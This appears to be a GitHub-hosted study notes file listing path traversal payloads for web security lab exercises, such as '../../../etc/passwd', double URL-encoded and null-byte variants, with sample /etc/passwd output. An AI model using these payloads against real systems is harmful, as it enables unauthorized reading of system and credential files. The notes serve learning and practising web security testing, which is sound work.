Directory traversal

File path traversal, simple case

image?filename=../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
...

File path traversal, traversal sequences blocked with absolute path bypass

image?filename=/etc/passwd

File path traversal, traversal sequences stripped non-recursively

?filename=....//....//....//etc/passwd

File path traversal, traversal sequences stripped with superfluous URL-decode

?filename=..%252f..%252f..%252fetc/passwd
# Decodes to ..%2f..%2f..%2fetc/passwd

File path traversal, validation of start of path

?filename=/var/www/images/../../../etc/passw

File path traversal, validation of file extension with null byte bypass

?filename=../../../etc/passwd%00.jpg

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

DirectoryTraversal.md

DirectoryTraversal.md

Directory traversal

File path traversal, simple case

File path traversal, traversal sequences blocked with absolute path bypass

File path traversal, traversal sequences stripped non-recursively

File path traversal, traversal sequences stripped with superfluous URL-decode

File path traversal, validation of start of path

File path traversal, validation of file extension with null byte bypass

Files

DirectoryTraversal.md

Latest commit

History

DirectoryTraversal.md

File metadata and controls

Directory traversal

File path traversal, simple case

File path traversal, traversal sequences blocked with absolute path bypass

File path traversal, traversal sequences stripped non-recursively

File path traversal, traversal sequences stripped with superfluous URL-decode

File path traversal, validation of start of path

File path traversal, validation of file extension with null byte bypass